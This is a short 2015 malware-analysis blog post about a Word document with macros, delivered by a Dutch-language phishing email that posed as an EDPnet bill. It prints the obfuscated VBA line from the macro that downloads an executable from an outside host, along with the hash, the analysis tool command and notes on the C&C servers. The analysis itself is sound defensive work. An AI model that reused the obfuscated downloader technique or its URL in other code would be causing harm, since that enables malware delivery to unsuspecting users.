Friday, June 12, 2015

3267298_2015061035.doc - MD5: 8ca62e90fea72d491a3933597b51d19f

Today a quick post about a piece of malware that I analyzed a couple of days ago. It came to the victim via mail. What was new was that it posed as a bill from a Belgian ISP called EDPnet and the e-mail was written in Dutch without any spelling errors.

It seemed a very legitimate e-mail actually coming from EDPnet although the IP address of the sender gave it away that the sender was from Brazil:

Received: from (

MIME-Version: 1.0


Date: Tue, 9 Jun 2015 04:00:46 -0200

Subject: Uw edpnet factuur 2015061035

As attachment there was a word document with a macro contained in it. The MD5 of the attachment was 8ca62e90fea72d491a3933597b51d19f. At the time of analysis there were only 2 AV's on virustotal that recognized it. The first submission was at 2015-06-09 07:20:08 UTC and the codepage is Cyrillic.

I used OfficeMalScanner by  Frank Boldewin to dump out the macro code:

C:\>OfficeMalScanner.exe 3267298_2015061035.doc info

Interestingly it dumped out 5 files:
  • Module1
  • Module3
  • Module4
  • Module5
  • ThisDocument
 Module1 is written in English and contains well documented code. In the code we found the following

 If InStr(1, d.Application.OperatingSystem, "NT") Then
        ' Use this line with Windows NT:
        winDrive = Left(Environ("WINDIR"), 3)
        Shell winDrive & "Program Files\Windows NT\dialer.exe", 1
        ' Use this line with Windows 95/98:
        winFolder = Environ("WINDIR")
        Shell winFolder & "\dialer.exe", 1
    End If

As you can make up from the comments, it is code that dates from a while back.

In Module3 we have again very nicely documented code written in English, the coding style resembles the code from Module1.

Module4 and Module5 have clean code but contains the malicious code. It uses the same principle as other malware. It starts with the creation of an XMLHTTP-object and then fetches the malware. The code for fetching the malware is:

CallByName HOPPOJJ2233, Chr(79) & Chr(112) & "e" & Chr(110), VbMethod, Chr(71) & Chr(69) & Chr(84), Chr(104) & "t" & "t" & Chr(112) & Chr(58) & "/" & Chr(47) & "p" & Chr(122) & "i" & "e" & Chr(110) & Chr(116) & Chr(97) & "r" & Chr(97) & Chr(46) & Chr(112) & Chr(108) & Chr(47) & Chr(52) & Chr(50) & "/" & Chr(49) & Chr(49) & ".e" & Chr(120) & Chr(101), False

It translates to a GET of hxxp:// Unfortunately I didn't get my hands on this executable but when analyzing the log files interestingly the victims used the same url (since they received the same Word document) but downloaded it from different IP addresses in a time span of less than 30 minutes. The IP addresses where:
Since I had victim machines at my disposal I had a look at what the the C&C-servers where and found they where making outbound connections to:
When we look at the IP in VirusTotal's Passive DNS we see that there were multiple samples hosted by the same naming logic namely hxxp:// and hxxp://

Analysis of  the IP in VirusTotal's Passive DNS gives us no result for hxxp://

Finally the IP address in VirusTotal's Passive DNS did not give any results for hxxp:// either.

As last idea I wanted to have a look at the geographical spreading of the C&C servers. We see that is in the is in USA, is in Russia and is in France.